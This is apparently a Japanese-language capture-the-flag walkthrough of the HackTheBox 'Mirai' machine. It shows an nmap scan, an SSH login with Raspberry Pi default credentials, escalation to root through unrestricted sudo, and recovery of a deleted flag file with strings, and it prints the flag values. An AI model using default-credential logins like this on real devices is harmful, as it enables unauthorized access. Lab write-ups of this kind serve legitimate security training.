80番ポートがアクセス可能
# nmap -A -n -F -T5 mirai.htb Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-15 07:33 UTC Nmap scan report for mirai.htb (10.10.10.48) Host is up (0.047s latency). Not shown: 80 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0) | ssh-hostkey: | 1024 aa:ef:5c:e0:8e:86:97:82:47:ff:4a:e5:40:18:90:c5 (DSA) | 2048 e8:c1:9d:c5:43:ab:fe:61:23:3b:d7:e4:af:9b:74:18 (RSA) | 256 b6:a0:78:38:d0:c8:10:94:8b:44:b2:ea:a0:17:42:2b (ECDSA) |_ 256 4d:68:40:f7:20:c4:e5:52:80:7a:44:38:b8:a2:a7:52 (ED25519) 23/tcp closed telnet 25/tcp closed smtp 53/tcp open domain dnsmasq 2.76 | dns-nsid: |_ bind.version: dnsmasq-2.76 80/tcp open http lighttpd 1.4.35 |_http-server-header: lighttpd/1.4.35 |_http-title: Website Blocked 111/tcp closed rpcbind 113/tcp closed ident 443/tcp closed https 445/tcp closed microsoft-ds 993/tcp closed imaps 995/tcp closed pop3s 1025/tcp closed NFS-or-IIS 3986/tcp closed mapper-ws_ethd 5060/tcp closed sip 5631/tcp closed pcanywheredata 8009/tcp closed ajp13 8081/tcp closed blackice-icecap 8888/tcp closed sun-answerbook 32768/tcp closed filenet-tms 49152/tcp closed unknown OS fingerprint not ideal because: Timing level 5 (Insane) used No OS matches for host Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
ラズベリーパイのデフォルトユーザでログインしてみる
Pi-hole v3.1.4 が動作している。広告をブロックするDNSを動作させるプログラムらしい。
そしてラズベリーパイで構築することがよくあるらしい。デフォルトIDでSSHすることができた。
username:pi
password:raspberry
# ssh pi@mirai.htb The authenticity of host 'mirai.htb (10.10.10.48)' can't be established. ECDSA key fingerprint is SHA256:UkDz3Z1kWt2O5g2GRlullQ3UY/cVIx/oXtiqLPXiXMY. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added 'mirai.htb,10.10.10.48' (ECDSA) to the list of known hosts. pi@mirai.htb's password: Permission denied, please try again. pi@mirai.htb's password: The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Sun Aug 27 14:47:50 2017 from localhost SSH is enabled and the default password for the 'pi' user has not been changed. This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password. pi@raspberrypi:~ $ sudo -l Matching Defaults entries for pi on localhost: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User pi may run the following commands on localhost: (ALL : ALL) ALL (ALL) NOPASSWD: ALL pi@raspberrypi:~ $ sudo su # cat Desktop/user.txt ff837707441b257a20e32199d7c8838d
root.txtを確認する
# cat /root/root.txt I lost my original root.txt! I think I may have a backup on my USB stick... # df -h Filesystem Size Used Avail Use% Mounted on aufs 8.5G 2.8G 5.3G 34% / tmpfs 100M 4.8M 96M 5% /run /dev/sda1 1.3G 1.3G 0 100% /lib/live/mount/persistence/sda1 /dev/loop0 1.3G 1.3G 0 100% /lib/live/mount/rootfs/filesystem.squashfs tmpfs 250M 0 250M 0% /lib/live/mount/overlay /dev/sda2 8.5G 2.8G 5.3G 34% /lib/live/mount/persistence/sda2 devtmpfs 10M 0 10M 0% /dev tmpfs 250M 8.0K 250M 1% /dev/shm tmpfs 5.0M 4.0K 5.0M 1% /run/lock tmpfs 250M 0 250M 0% /sys/fs/cgroup tmpfs 250M 8.0K 250M 1% /tmp /dev/sdb 8.7M 93K 7.9M 2% /media/usbstick tmpfs 50M 0 50M 0% /run/user/999 tmpfs 50M 0 50M 0% /run/user/1000 # cat /media/usbstick/damnit.txt Damnit! Sorry man I accidentally deleted your files off the USB stick. Do you know if there is any way to get them back? -James # strings /dev/sdb >r & /media/usbstick lost+found root.txt damnit.txt >r & >r & /media/usbstick lost+found root.txt damnit.txt >r & /media/usbstick 2]8^ lost+found root.txt damnit.txt >r & 3d3e483143ff12ec505d026fa13e020b Damnit! Sorry man I accidentally deleted your files off the USB stick. Do you know if there is any way to get them back? -James